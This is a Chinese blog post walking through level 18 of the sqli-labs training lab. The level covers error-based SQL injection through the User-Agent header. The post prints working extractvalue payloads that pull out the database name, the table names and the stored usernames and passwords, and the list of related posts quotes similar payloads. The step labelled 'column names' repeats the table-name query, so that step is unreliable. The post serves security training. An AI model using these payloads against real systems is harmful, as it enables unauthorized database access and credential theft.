SQL-labs的第18关——http请求头注入(User-Agent)报错注入

最新推荐文章于 2024-03-15 01:34:38 发布
最新推荐文章于 2024-03-15 01:34:38 发布
阅读量376 收藏 1
点赞数
文章标签: 数据库 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/131850955
版权

1、判断闭合方式

我们先使用burp破解出一个正确的账号和密码,返回正常的页面,如下:

账号:admin ,密码:admin

它显示了User-Agent,我们大胆猜测注入点在这里。

我们在截取的数据包中的User-Agent上加上一个'。返回页面如下:

出现报错。这说明闭合方式就是'。

2、确定注入方式

我们发现没有回显。

并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。

3、爆破数据库名、用户名、版本

输入语句

1',1,extractvalue(1,concat('~',(select concat(database(),'-',user(),'-',version())),'~')))#

,返回页面如下:

4、爆破数据表名

输入语句

1',1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')))#

,返回页面如下:

5、爆破列名

输入语句

1',1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')))#

,返回页面如下:

6、爆破数据

输入语句

1',1,extractvalue(1,concat('~',(select group_concat(concat(username,'~',password)) from users),'~')))#

,返回页面如下:

很显然,这里的数据没有显示完全。我们将语句改为:

1',1,extractvalue(1,concat('~',mid((select group_concat(concat(username,'~',password)) from users),10,5),'~')))#

,返回页面如下:

通过改变mid函数的后面两个参数可以改变返回的内容。

到此打靶结束

Hacker-小胖锅
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
sqli-labs第十八详解
金 帛的博客
05-03 4485
SQL注入靶场第十八详解
sqli-labs--------第18
wyzhxhn的博客
11-10 1194
sql插入语句 User-Agent
sqllab第十八笔记
最新发布
I_WORM的博客
03-15 481
构造payload:1' and extractvalue(1,concat(0x7e,database(),0x7e))='推测原始语句为 insert into 表名(字段1,字段2,...) values(数据1,数据2,...);这里显然不是一个查询语句,也不是一个update语句,可能是insert语句。突然想到这个位置好像不能用+,这里是不进行url解析的,换成空格试试。成功获取了数据库名字,获取敏感信息也是同样的操作;成功执行了exp(710),这里可以进行错误注入。说明这是一个UA注入
sqli-labs第十八
yuqnqi的博客
05-10 360
通过注入点测试填写正确的账户密码可以获得浏览器标识符,所以应该是通过浏览器标识符进行注入,为确认一下猜测是否正确,查看一下源码。注入点在 uagent处,确定注入点后,输入SQL语句。可以参考前面的单引号注入,比如第十一,我就先溜了。页面提示user agent。接下来就正常的注入了。
sql_labs18
陈艺秋的博客
05-20 97
判断闭合符,在User-Agent字段结束添加单引号,触发报错说明闭合符有用,但是下面的报错信息有点看不懂,User-Agent字段后面咋还跟了俩数据。看到了admin后面有个单括号,说明前面也是拥有一个左括号与之闭合,所以我们可以在注入语句后多添加一个右括号,绕过。之后经过查看知道了两个admin就可以登录上,并且可以查看到user_agent信息。多构造一个括号,这里不晓得为啥--+注释符不行,换成了#注释符,成功回显相信息。还有就是既然发生了闭合,那么我们也可以在语句之后再构造一个单引号,绕过。
SQLi Labs Lesson18
1ame的博客
08-15 1820
Lesson - 18 POST - Header Injection - Uagent field - Error based 首先进入欢迎界面: 本节对username,password都进行了过滤。 后台过滤的php源代码: $uname = check_input($_POST['uname']); $passwd = check_input($_POST['
sqli-labs基础篇 第18~22
Lucky小小吴的小屋
01-23 2318
sqli-labs基础篇 第18~22,主要学习内容:burp抓包、数据包修改
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sql-labs通技巧
03-01
SQL注入常用靶场的通技巧
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
sqli-labs ————less -18
Fly_鹏程万里
05-12 3729
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqlilabs-18
KAKA的博客
07-09 864
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli-lab靶场18基于post的部信息报错注入
qq_46527080的博客
12-18 587
知识点 $_SERVER['HTTP_USER_AGENT']。 这是用来检查浏览页面的访问者在用什么浏览器.   其中需要检查用户的 agent 字符串,它是浏览器发送的 HTTP 请求的一部分。   如:var_dump($_SERVER['HTTP_USER_AGENT']);   输出:string(65) "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Fire 通过查看源码看到,是一个insert的语句,我们通过构造updatexml
sqli-labs第十八和十九(请求注入)
qq_42266432的博客
08-29 1007
进入到第十八,发现页面显示了一个ip,ip一般是请求里host变量的参数,说明这可能与请求,先简单说明下请求里一堆变量的作用: Host:主机或域名地址 Accept:指浏览器或其他用户可接受的MIME文件格式,Servlet可以根据它来判断并返回适当的文件格式 User-Agent:记录客户浏览器的名称,版本啥的 Accept-Language:浏览器可接受的语言,比如en-us或者en指英语 connection:用来告诉服务器是否维持固定的http连接,这里默认值是KEEP-ALIVE保
SQL-Lab 18~22
qq_52921637的博客
03-21 290
less18 第十八我们可以看到,这一注入 首先,我们应该在本中加入sql语句:当我们使用用户名:admin 和密码:admin的时候,会出现错误,并显现出IP地址:这是因为,我们在上一修改了密码:当我们使用,用户名:admin 密码:afafa时会显示:(登录成功)此时会出现:你的IP地址和User-Agent :我们可以用post数据包header部的注入注入点是User-Agent 步骤:设置代理,burp抓取数据包,将数据包寄到repeater然后再使用SQL注入语句即可报出数据库版本
SQL注入HTTP请求注入
qq_52310755的博客
03-22 1293
用户输入的语句带入到数据库执行参数可控带入到数据库执行HTTP注入也是一模一样,用户可以控制HTTP请求,后端带入到数据库执行,这两个条件缺一个都不可以!
SQL注入useragent注入
studyphp123的博客
04-23 805
一、预备知识 二、实验目的 三、实验工具 浏览器、Burpsuite 四、实验环境 客户机一台 五、实验步骤 第一步:查看网页,显示的是访问者的 useragent 信息,所有可以通过 useragent 语句进行注入。 打开 http://www.any.com/sqli/Less-18/,手动设置代理为 127.0.0.1:8080 第二步:查看当前数据库名称,MySQL版本信息。 1)...
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值